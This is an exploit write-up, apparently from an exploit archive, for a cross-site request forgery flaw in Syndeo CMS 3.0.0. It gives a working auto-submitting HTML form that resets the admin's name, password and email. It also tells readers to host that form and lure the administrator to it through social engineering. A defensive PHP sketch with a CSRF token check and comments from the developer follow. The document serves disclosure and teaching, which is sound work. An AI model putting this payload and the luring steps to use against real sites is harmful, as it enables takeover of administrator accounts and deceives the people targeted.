Syndeo CMS Admin Password Change through CSRF

# Exploit Title: Syndeo CMS Admin Password Change through CSRF
# Google Dork: none
# Date: 5/12/2013
# Exploit Author: Aditya Joshi
# Vendor Homepage:
# Software Link:
# Version: 3.0.0
# Tested on: Windows 7
# Status: Fixed

Description ...
In Syndeo CMS an attacker can easily change the admin name, password and email through a CSRF vulnerability.
The vulnerability exists in http://localhost/cms/starnet/index.php?option=configuration&save=personal , where the admin name and password change text fields are submitted without any anti-CSRF token.

Exploiting the BUG ...
Create an HTML page and paste the following HTML code into it ...


<html>
<body onload="form1.submit();">
<form method="POST" name="form1" action="http://localhost/cms/starnet/index.php?option=configuration&save=personal">
  <input class="textfield" type="text" value="hacker" size="40" name="fullname" tabindex="1">
  <input class="textfield" type="text" value="" size="40" name="email" tabindex="2">
  <input class="textfield" type="text" value="admin" size="20" name="username" tabindex="3">
  <input class="textfield" type="password" value="hacker" size="20" name="password" tabindex="4">
</form>
</body>
</html>

and upload the malicious page to any free web hosting site..
Now send the link to the malicious HTML page, through social engineering, to the admin of the vulnerable Syndeo web app

To fix this bug kindly visit this link 
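The vendor's fix is not reproduced on this page. As an added illustration (not SyndeoCMS code, written for this page), the sketch below shows the "save=personal" handler in the shape the advisory describes, where any POST is trusted, beside a hardened shape that embeds a per-session synchronizer token in the form and rejects a save that does not echo it back. The field names follow the advisory's form (fullname, email, username, password); the function names, the update_admin_account() stub and the session key csrf_token are assumptions.

```php
<?php
// Added illustration, not SyndeoCMS code. Field names come from the advisory's
// form; update_admin_account(), csrf_token() and the other names are hypothetical.
session_start();

// Hypothetical stand-in for the CMS's own persistence routine.
function update_admin_account(string $fullname, string $email, string $username, string $password): void
{
    error_log("would update admin account for user '$username'");
}

// Vulnerable shape: the handler trusts any POST carrying the right field names,
// so an auto-submitting form on another origin (like the PoC above) can
// overwrite the logged-in admin's name, email and password.
function save_personal_vulnerable(array $post): void
{
    update_admin_account($post['fullname'], $post['email'], $post['username'], $post['password']);
}

// Hardened shape: issue one unguessable secret per session, embed it in the
// form, and require it on save. A cross-origin page can submit the form but
// cannot read the token, so the forged request fails the check.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32)); // 256-bit random, hex-encoded
    }
    return $_SESSION['csrf_token'];
}

function csrf_check(array $post): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    // hash_equals() compares in constant time, avoiding a timing side channel.
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

function save_personal_hardened(array $post): void
{
    if (!csrf_check($post)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // Asking for the current password before changing credentials would be a
    // further layer; the token alone only proves the request came from our form.
    update_admin_account($post['fullname'], $post['email'], $post['username'], $post['password']);
}

// The form now carries the token as a hidden field next to the existing inputs.
function render_personal_form(): string
{
    $t = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<form method="POST" action="index.php?option=configuration&amp;save=personal">'
         . '<input type="hidden" name="csrf_token" value="' . $t . '">'
         . '<input type="text" name="fullname">'
         . '<input type="text" name="email">'
         . '<input type="text" name="username">'
         . '<input type="password" name="password">'
         . '<input type="submit" value="Save">'
         . '</form>';
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    save_personal_hardened($_POST);
} else {
    echo render_personal_form();
}
```

Setting the session cookie with SameSite=Lax or Strict adds defence in depth, since the browser then withholds it on the cross-site POST the PoC relies on, but the token check is what makes the handler safe in browsers that do not honour the attribute.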

Greets ---> Aditya Dixit, Deejay alone , Indian Web King....



  1. I have fixed this exploit, see our forum:

    Kind regards Fred Stuurman
    Main developer SyndeoCMS

    1. there are so many exploits in it

  2. Good work bro, in the next update of your CMS I will surely try to find bugs and will report to you

